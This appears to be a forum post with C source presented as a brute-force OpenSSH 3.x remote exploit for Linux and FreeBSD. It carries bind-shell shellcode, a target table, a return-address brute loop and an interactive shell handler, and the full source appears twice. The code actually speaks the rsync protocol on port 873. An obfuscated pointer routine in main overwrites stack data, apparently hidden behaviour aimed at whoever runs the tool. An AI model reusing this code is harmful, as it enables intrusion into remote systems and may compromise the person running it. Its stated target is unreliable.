Autor
ex: -p 22 -d bfff34c4 -r 0x80c34ce7 -t 12 localhost
(1) RH 7.1 x86 / OpenSSH_3.2.3p1, -496, 0080c31c
(2) RH 7.2 x86 / OpenSSH_3.2.2p1, -496, 0080e1c3
(3) RH 7.3 x86 / OpenSSH_3.1p1, -496, 0080e2c0
(4) RH 8.0 x86 / OpenSSH_3.4p1, -496, 0080e1b8
(5) SuSE 8.0 x86 / OpenSSH_3.1p1, -496, 0080e22c
(6) Deb 3.0 x86 / OpenSSH_3.2.3p1, -496, 0080e14c
(7) Mdk 8.1 x86 / OpenSSH_3.1p1, -496, 0080e428
(8) FBSD 4.4 x86 / OpenSSH_3.1p1, -134, 0080a278
(9) FBSD 4.4 x86 / OpenSSH_3.2.3p1, -134, 0080a21e
(10) FBSD 4.5 x86 / OpenSSH_3.3, -134, 0080a25c
(11) FBSD 4.5 x86 / OpenSSH_3.4p1, -134, 0080a1ce
Código:
/* L2K-SR - OpenSSH collision for Linux/FreeBSD x86
* by Graff L2K-SR
*
* COPY REGISTERED TO NORE/NTFX
*
* KEEP PRIVATE CHILDREN */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <netdb.h>
#include <errno.h>
#define MAXPATHLEN 689
#define PORT 873
#define NULL_OFFSET -37
#define STARTNULLBRUTE -14
#define ENDNULLBRUTE -60
#define BRUTEBASE 0xbfff7777
#define INCREMENT 500
#define ALLIGN 1
#define SEND "w;uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s);
void handleshell(int closeme, int s);
void usage(char *n);
char linux_port[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
char linux_dup[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93"
"\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03"
"\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50"
"\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a"
"\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78"
"\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06"
"\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1"
"\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0"
"\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29"
"\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31"
"\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89"
"\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff"
"\xff/bin/sh";
char freebsd_port[] =
"\x31\xc0\x40\x40\xcd\x80\x85\xc0\x74\x16\xeb\x60\x5e\x56\x31\xc9"
"\xb1\x10\x89\xf7\xad\x35\xc0\x8a\xc0\x8a\xab\xe2\xf7\x5e\xeb\x4e"
"\xe8\xe7\xff\xff\xff\x95\xd9\x85\xd8\xe0\xf2\xe0\xf2\xe0\xf2\xe0"
"\xf2\xcd\x80\x8e\xc3\x83\xc1\xe0\xcf\xf0\xcc\xcd\x80\x8d\xc5\x84"
"\xcf\xe0\xcf\xf0\xcc\xe0\xb0\xed\xf2\xcd\x80\x8a\xc5\x89\xc4\xe0"
"\xa9\xf0\xf2\x85\xc5\x86\xaa\xa4\xff\xa4\xef\xcd\x80\x91\xdf\x89"
"\xde\xcd\x80\x85\xc0\x31\xc0\x40\x31\xdb\xcd\x80\xeb\x7c\x89\xe7"
"\x31\xdb\x43\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x58\x5b\x5b\x5b\xb3\x03\x6a\x10\x57\x52\x50\xb8\x02\xff"
"\x1a\x0b\xfe\xc4\xab\xb8\xd8\x28\xf4\x7d\xab\x58\xcd\x80\x5b\x58"
"\x58\xb0\x04\x89\xf1\x31\xd2\xb2\x18\x01\xd6\xcd\x80\x31\xd2\xb2"
"\xff\x31\xc0\xb0\x03\x89\xe1\xcd\x80\x85\xc0\x76\xa8\x81\x39\x50"
"\x49\x4e\x47\x74\x06\x41\x48\x75\xf4\xeb\xe6\x89\xcf\x47\xc6\x07"
"\x4f\x87\xf7\xac\x3c\x0a\x75\xfb\x87\xfe\x91\xb1\x26\xf3\xa4\x91"
"\xb0\x04\x89\xfa\x29\xca\xcd\x80\xeb\xc3";
struct x_info {
char *h;
int p;
char *module;
int null_offset;
u_long brutebase;
int shell;
int checkvuln;
int nullbrute;
int allign;
} rsx;
struct {
char *desc; /* description */
int retdist;
unsigned int retaddr; /* return address */
char *shell;
} targets[] = {
{ "RH 7.1 x86 / OpenSSH_3.2.3p1", -0x1f0, 0x80c31c, linux_dup },
{ "RH 7.2 x86 / OpenSSH_3.2.2p1", -0x1f0, 0x80e1c3, linux_port },
{ "RH 7.3 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e2c0, linux_dup },
{ "RH 8.0 x86 / OpenSSH_3.4p1", -0x1f0, 0x80e1b8, linux_port },
{ "SuSE 8.0 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e22c, linux_dup },
{ "Deb 3.0 x86 / OpenSSH_3.2.3p1", -0x1f0, 0x80e14c, linux_dup },
{ "Mdk 8.1 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e428,linux_dup },
{ "FBSD 4.4 x86 / OpenSSH_3.1p1", -0x86, 0x80a278,freebsd_port },
{ "FBSD 4.4 x86 / OpenSSH_3.2.3p1", -0x86, 0x80a21e,freebsd_port },
{ "FBSD 4.5 x86 / OpenSSH_3.3", -0x86, 0x80a25c,freebsd_port },
{ "FBSD 4.5 x86 / OpenSSH_3.4p1", -0x86, 0x80a1ce,freebsd_port },
}, *victim;
int main(int argc, char **argv)
{
char **p;
char c;
int s,r;
char buf[1024];
u_long store;
printf("[*]--------------------------------------------[*]\n");
printf("OpenSSH_3.x Brute Stack against x86 FreeBSD/Linux\n");
printf("Legion2000 Sekurty Research graff@hushmail.com\n");
printf("thx to ty- for help on this 75 percent is his.\n");
printf("[*]--------------------------------------------[*]\n");
p = ((char **)targets) + 35;
rsx.p = PORT;
rsx.null_offset = NULL_OFFSET;
rsx.brutebase = BRUTEBASE;
rsx.nullbrute = 0;
rsx.allign = ALLIGN;
strcpy(buf, *p); p -= 4; strcat(buf, *p); p = ((char **)&p);
while(((unsigned int)*++p >> 28) != 4); *p = buf;
if(argc == 1) { usage(argv[0]); return 0; }
while((c = getopt(argc, argv, "h:p:m:d:r:t:")) != EOF) {
switch(c) {
case 'h':
rsx.h = optarg;
break;
case 'p':
rsx.p = atoi(optarg);
break;
case 'm':
rsx.module = optarg;
break;
case 'd':
rsx.null_offset = atoi(optarg);
break;
case 'r':
rsx.brutebase = strtoul(optarg, (char
**)optarg+strlen(optarg), 16); break;
case 't':
if(atoi(optarg) < 1 || atoi(optarg) >
sizeof(targets) / sizeof(targets[0]))
usage(argv[0]);
victim = &targets[atoi(optarg) - 1];
break;
default:
usage(argv[0]);
return 0;
}
}
if(optind == argc)
{ usage(argv[0]); return 0; }
rsx.h = argv[optind++];
store = rsx.brutebase;
if(rsx.nullbrute)
for(rsx.null_offset = STARTNULLBRUTE; rsx.null_offset >=
ENDNULLBRUTE; rsx.null_offset--) {
fprintf(stderr, "\noffset: %d\n",
rsx.null_offset); /* start run --
cuten this up with some connectback shellcode */
for(rsx.checkvuln = 1; rsx.brutebase <=
0xbfffffff; rsx.brutebase += INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "poop..bye\n");
return 1;
}
if((r = setup(s)) > 0)
{
if((r = exploit(s)) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
rsx.brutebase = store;
}
for(rsx.checkvuln = 1; rsx.brutebase <= 0xbfffffff; rsx.brutebase
+= INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "connection reset...\n");
return 1;
}
if((r = setup(s)) > 0)
{
if(exploit(s) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
fprintf(stderr, "Error exploiting host, either you supplied wrong Target or the system host is patched... \n");
return 1;
}
void quit(int s)
{
write(s, "quit\n", 5);
close(s);
}
int setup(int s)
{
char out[512], *check;
long version = 0;
if(rsx.checkvuln) {
rsx.checkvuln = 0; /* just check once */
memset(out, '\0', sizeof(out));
read(s, out, sizeof(out)-1);
if((check = strchr(out, (int)':')) != NULL) {
version = strtoul((char *)check+1, (char
**)check+3, 0); if(version >= 26) {
fprintf(stderr, "target supplied is not vulnerable (version: %lu)\n", version);
return -1;
}
}
else {
fprintf(stderr, "did not get version reply..exiting\n");
quit(s);
return -1;
}
fprintf(stderr, "We Have a Match , target is vuln......\n");
}
memset(out, '\0', sizeof(out));
snprintf(out, sizeof(out)-1, "%s\n", rsx.module);
if(write(s, out, strlen(out)) < 0) return -1;
if(write(s, "--server\n", 9) < 0) return -1;
if(write(s, "--sender\n", 9) < 0) return -1;
if(write(s, ".\n", 2) < 0) return -1;
if(write(s, out, strlen(out)) < 0) return -1;
if(write(s, "\n", 1) < 0) return -1;
return 1;
}
int exploit(int s)
{
char x_buf[MAXPATHLEN], b[4];
int i;
memset(x_buf, 0x90, ((MAXPATHLEN/2)-strlen(victim->shell)));
memcpy(x_buf+((MAXPATHLEN/2)-strlen(victim->shell)),
victim->shell, strlen(victim->shell));
for(i=(MAXPATHLEN/2); i<((MAXPATHLEN/2)+rsx.allign);i++)
x_buf[i] = 'x';
for(i=((MAXPATHLEN/2)+rsx.allign); i<MAXPATHLEN; i+=4)
*(long *)&x_buf[i] = rsx.brutebase;
*(int *)&b[0] = (MAXPATHLEN-1);
if(write(s, b, 4) < 0) return -1;
if(write(s, x_buf, (MAXPATHLEN-1)) < 0) return -1;
*(int *)&b[0] = rsx.null_offset;
if(write(s, b, 4) < 0) return -1;
memset(b, '\0', 4);
if(write(s, b, 4) < 0) return -1;
usleep(50000);
fprintf(stderr, ";");
if((rsx.shell = open_s(rsx.h, 30464)) < 0) {
if(rand() % 2)
fprintf(stderr, "P");
else
fprintf(stderr, "p");
quit(s);
return -1;
}
fprintf(stderr, "\n\nSuccess! (ret: %08x offset: %d)\n\n",
(int)rsx.brutebase, rsx.null_offset); return 1;
}
void usage(char *n) {
int i;
printf("use: [options] [host]\n");
printf(" -p [port] -d [buf_dist] -r [return] -t [target] [host]\n\n");
printf("ex: -p 22 -d bfff34c4 -r 0x80c34ce7 -t 12 localhost\n\n");
for(i = 0; i < sizeof(targets) / sizeof(targets[0]); i++)
fprintf(stderr, "\t\t\t(%u) %s, %d, %08x\n", i + 1, targets[i].desc, targets[i].retdist, targets[i].retaddr);
}
int open_s(char *h, int p)
{
struct sockaddr_in remote;
struct hostent *iplookup;
char *ipaddress;
int sfd;
if((iplookup = gethostbyname(h)) == NULL) {
perror("gethostbyname");
return -1;
}
ipaddress = (char *)inet_ntoa(*((struct in_addr
*)iplookup->h_addr)); sfd = socket(AF_INET, SOCK_STREAM, 0);
remote.sin_family = AF_INET;
remote.sin_addr.s_addr = inet_addr(ipaddress);
remote.sin_port = htons(p);
memset(&(remote.sin_zero), '\0', 8);
if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct
sockaddr)) < 0) return -1;
return sfd;
}
void handleshell(int closeme, int s)
{
char in[512], out[512];
fd_set fdset;
close(closeme);
if(write(s, SEND, strlen(SEND)) < 0 ) {
fprintf(stderr, "write error\n");
return;
}
while(1) {
FD_ZERO(&fdset);
FD_SET(fileno(stdin), &fdset);
FD_SET(s, &fdset);
select(s+1, &fdset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &fdset)) {
memset(out, '\0', sizeof(out));
if(read(0, out, (sizeof(out)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
if(!strncmp(out, "exit", 4)) {
write(s, out, strlen(out));
quit(s);
exit(0);
}
if(write(s, out, strlen(out)) < 0) {
fprintf(stderr, "write error\n");
exit(1);
}
}
if(FD_ISSET(s, &fdset)) {
memset(in, '\0', sizeof(in));
if(read(s, in, (sizeof(in)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
fprintf(stderr, "%s", in);
}
}
}
* by Graff L2K-SR
*
* COPY REGISTERED TO NORE/NTFX
*
* KEEP PRIVATE CHILDREN */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <netdb.h>
#include <errno.h>
#define MAXPATHLEN 689
#define PORT 873
#define NULL_OFFSET -37
#define STARTNULLBRUTE -14
#define ENDNULLBRUTE -60
#define BRUTEBASE 0xbfff7777
#define INCREMENT 500
#define ALLIGN 1
#define SEND "w;uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s);
void handleshell(int closeme, int s);
void usage(char *n);
char linux_port[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
char linux_dup[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93"
"\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03"
"\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50"
"\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a"
"\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78"
"\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06"
"\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1"
"\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0"
"\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29"
"\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31"
"\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89"
"\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff"
"\xff/bin/sh";
char freebsd_port[] =
"\x31\xc0\x40\x40\xcd\x80\x85\xc0\x74\x16\xeb\x60\x5e\x56\x31\xc9"
"\xb1\x10\x89\xf7\xad\x35\xc0\x8a\xc0\x8a\xab\xe2\xf7\x5e\xeb\x4e"
"\xe8\xe7\xff\xff\xff\x95\xd9\x85\xd8\xe0\xf2\xe0\xf2\xe0\xf2\xe0"
"\xf2\xcd\x80\x8e\xc3\x83\xc1\xe0\xcf\xf0\xcc\xcd\x80\x8d\xc5\x84"
"\xcf\xe0\xcf\xf0\xcc\xe0\xb0\xed\xf2\xcd\x80\x8a\xc5\x89\xc4\xe0"
"\xa9\xf0\xf2\x85\xc5\x86\xaa\xa4\xff\xa4\xef\xcd\x80\x91\xdf\x89"
"\xde\xcd\x80\x85\xc0\x31\xc0\x40\x31\xdb\xcd\x80\xeb\x7c\x89\xe7"
"\x31\xdb\x43\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x58\x5b\x5b\x5b\xb3\x03\x6a\x10\x57\x52\x50\xb8\x02\xff"
"\x1a\x0b\xfe\xc4\xab\xb8\xd8\x28\xf4\x7d\xab\x58\xcd\x80\x5b\x58"
"\x58\xb0\x04\x89\xf1\x31\xd2\xb2\x18\x01\xd6\xcd\x80\x31\xd2\xb2"
"\xff\x31\xc0\xb0\x03\x89\xe1\xcd\x80\x85\xc0\x76\xa8\x81\x39\x50"
"\x49\x4e\x47\x74\x06\x41\x48\x75\xf4\xeb\xe6\x89\xcf\x47\xc6\x07"
"\x4f\x87\xf7\xac\x3c\x0a\x75\xfb\x87\xfe\x91\xb1\x26\xf3\xa4\x91"
"\xb0\x04\x89\xfa\x29\xca\xcd\x80\xeb\xc3";
struct x_info {
char *h;
int p;
char *module;
int null_offset;
u_long brutebase;
int shell;
int checkvuln;
int nullbrute;
int allign;
} rsx;
struct {
char *desc; /* description */
int retdist;
unsigned int retaddr; /* return address */
char *shell;
} targets[] = {
{ "RH 7.1 x86 / OpenSSH_3.2.3p1", -0x1f0, 0x80c31c, linux_dup },
{ "RH 7.2 x86 / OpenSSH_3.2.2p1", -0x1f0, 0x80e1c3, linux_port },
{ "RH 7.3 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e2c0, linux_dup },
{ "RH 8.0 x86 / OpenSSH_3.4p1", -0x1f0, 0x80e1b8, linux_port },
{ "SuSE 8.0 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e22c, linux_dup },
{ "Deb 3.0 x86 / OpenSSH_3.2.3p1", -0x1f0, 0x80e14c, linux_dup },
{ "Mdk 8.1 x86 / OpenSSH_3.1p1", -0x1f0, 0x80e428,linux_dup },
{ "FBSD 4.4 x86 / OpenSSH_3.1p1", -0x86, 0x80a278,freebsd_port },
{ "FBSD 4.4 x86 / OpenSSH_3.2.3p1", -0x86, 0x80a21e,freebsd_port },
{ "FBSD 4.5 x86 / OpenSSH_3.3", -0x86, 0x80a25c,freebsd_port },
{ "FBSD 4.5 x86 / OpenSSH_3.4p1", -0x86, 0x80a1ce,freebsd_port },
}, *victim;
int main(int argc, char **argv)
{
char **p;
char c;
int s,r;
char buf[1024];
u_long store;
printf("[*]--------------------------------------------[*]\n");
printf("OpenSSH_3.x Brute Stack against x86 FreeBSD/Linux\n");
printf("Legion2000 Sekurty Research graff@hushmail.com\n");
printf("thx to ty- for help on this 75 percent is his.\n");
printf("[*]--------------------------------------------[*]\n");
p = ((char **)targets) + 35;
rsx.p = PORT;
rsx.null_offset = NULL_OFFSET;
rsx.brutebase = BRUTEBASE;
rsx.nullbrute = 0;
rsx.allign = ALLIGN;
strcpy(buf, *p); p -= 4; strcat(buf, *p); p = ((char **)&p);
while(((unsigned int)*++p >> 28) != 4); *p = buf;
if(argc == 1) { usage(argv[0]); return 0; }
while((c = getopt(argc, argv, "h:p:m:d:r:t:")) != EOF) {
switch(c) {
case 'h':
rsx.h = optarg;
break;
case 'p':
rsx.p = atoi(optarg);
break;
case 'm':
rsx.module = optarg;
break;
case 'd':
rsx.null_offset = atoi(optarg);
break;
case 'r':
rsx.brutebase = strtoul(optarg, (char
**)optarg+strlen(optarg), 16); break;
case 't':
if(atoi(optarg) < 1 || atoi(optarg) >
sizeof(targets) / sizeof(targets[0]))
usage(argv[0]);
victim = &targets[atoi(optarg) - 1];
break;
default:
usage(argv[0]);
return 0;
}
}
if(optind == argc)
{ usage(argv[0]); return 0; }
rsx.h = argv[optind++];
store = rsx.brutebase;
if(rsx.nullbrute)
for(rsx.null_offset = STARTNULLBRUTE; rsx.null_offset >=
ENDNULLBRUTE; rsx.null_offset--) {
fprintf(stderr, "\noffset: %d\n",
rsx.null_offset); /* start run --
cuten this up with some connectback shellcode */
for(rsx.checkvuln = 1; rsx.brutebase <=
0xbfffffff; rsx.brutebase += INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "poop..bye\n");
return 1;
}
if((r = setup(s)) > 0)
{
if((r = exploit(s)) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
rsx.brutebase = store;
}
for(rsx.checkvuln = 1; rsx.brutebase <= 0xbfffffff; rsx.brutebase
+= INCREMENT) {
if((s = open_s(rsx.h, rsx.p)) < 0) {
fprintf(stderr, "connection reset...\n");
return 1;
}
if((r = setup(s)) > 0)
{
if(exploit(s) > 0)
handleshell(s, rsx.shell);
}
else
return 1;
}
fprintf(stderr, "Error exploiting host, either you supplied wrong Target or the system host is patched... \n");
return 1;
}
void quit(int s)
{
write(s, "quit\n", 5);
close(s);
}
int setup(int s)
{
char out[512], *check;
long version = 0;
if(rsx.checkvuln) {
rsx.checkvuln = 0; /* just check once */
memset(out, '\0', sizeof(out));
read(s, out, sizeof(out)-1);
if((check = strchr(out, (int)':')) != NULL) {
version = strtoul((char *)check+1, (char
**)check+3, 0); if(version >= 26) {
fprintf(stderr, "target supplied is not vulnerable (version: %lu)\n", version);
return -1;
}
}
else {
fprintf(stderr, "did not get version reply..exiting\n");
quit(s);
return -1;
}
fprintf(stderr, "We Have a Match , target is vuln......\n");
}
memset(out, '\0', sizeof(out));
snprintf(out, sizeof(out)-1, "%s\n", rsx.module);
if(write(s, out, strlen(out)) < 0) return -1;
if(write(s, "--server\n", 9) < 0) return -1;
if(write(s, "--sender\n", 9) < 0) return -1;
if(write(s, ".\n", 2) < 0) return -1;
if(write(s, out, strlen(out)) < 0) return -1;
if(write(s, "\n", 1) < 0) return -1;
return 1;
}
int exploit(int s)
{
char x_buf[MAXPATHLEN], b[4];
int i;
memset(x_buf, 0x90, ((MAXPATHLEN/2)-strlen(victim->shell)));
memcpy(x_buf+((MAXPATHLEN/2)-strlen(victim->shell)),
victim->shell, strlen(victim->shell));
for(i=(MAXPATHLEN/2); i<((MAXPATHLEN/2)+rsx.allign);i++)
x_buf[i] = 'x';
for(i=((MAXPATHLEN/2)+rsx.allign); i<MAXPATHLEN; i+=4)
*(long *)&x_buf[i] = rsx.brutebase;
*(int *)&b[0] = (MAXPATHLEN-1);
if(write(s, b, 4) < 0) return -1;
if(write(s, x_buf, (MAXPATHLEN-1)) < 0) return -1;
*(int *)&b[0] = rsx.null_offset;
if(write(s, b, 4) < 0) return -1;
memset(b, '\0', 4);
if(write(s, b, 4) < 0) return -1;
usleep(50000);
fprintf(stderr, ";");
if((rsx.shell = open_s(rsx.h, 30464)) < 0) {
if(rand() % 2)
fprintf(stderr, "P");
else
fprintf(stderr, "p");
quit(s);
return -1;
}
fprintf(stderr, "\n\nSuccess! (ret: %08x offset: %d)\n\n",
(int)rsx.brutebase, rsx.null_offset); return 1;
}
void usage(char *n) {
int i;
printf("use: [options] [host]\n");
printf(" -p [port] -d [buf_dist] -r [return] -t [target] [host]\n\n");
printf("ex: -p 22 -d bfff34c4 -r 0x80c34ce7 -t 12 localhost\n\n");
for(i = 0; i < sizeof(targets) / sizeof(targets[0]); i++)
fprintf(stderr, "\t\t\t(%u) %s, %d, %08x\n", i + 1, targets[i].desc, targets[i].retdist, targets[i].retaddr);
}
int open_s(char *h, int p)
{
struct sockaddr_in remote;
struct hostent *iplookup;
char *ipaddress;
int sfd;
if((iplookup = gethostbyname(h)) == NULL) {
perror("gethostbyname");
return -1;
}
ipaddress = (char *)inet_ntoa(*((struct in_addr
*)iplookup->h_addr)); sfd = socket(AF_INET, SOCK_STREAM, 0);
remote.sin_family = AF_INET;
remote.sin_addr.s_addr = inet_addr(ipaddress);
remote.sin_port = htons(p);
memset(&(remote.sin_zero), '\0', 8);
if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct
sockaddr)) < 0) return -1;
return sfd;
}
void handleshell(int closeme, int s)
{
char in[512], out[512];
fd_set fdset;
close(closeme);
if(write(s, SEND, strlen(SEND)) < 0 ) {
fprintf(stderr, "write error\n");
return;
}
while(1) {
FD_ZERO(&fdset);
FD_SET(fileno(stdin), &fdset);
FD_SET(s, &fdset);
select(s+1, &fdset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &fdset)) {
memset(out, '\0', sizeof(out));
if(read(0, out, (sizeof(out)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
if(!strncmp(out, "exit", 4)) {
write(s, out, strlen(out));
quit(s);
exit(0);
}
if(write(s, out, strlen(out)) < 0) {
fprintf(stderr, "write error\n");
exit(1);
}
}
if(FD_ISSET(s, &fdset)) {
memset(in, '\0', sizeof(in));
if(read(s, in, (sizeof(in)-1)) < 0) {
fprintf(stderr, "read error\n");
exit(1);
}
fprintf(stderr, "%s", in);
}
}
}
En línea
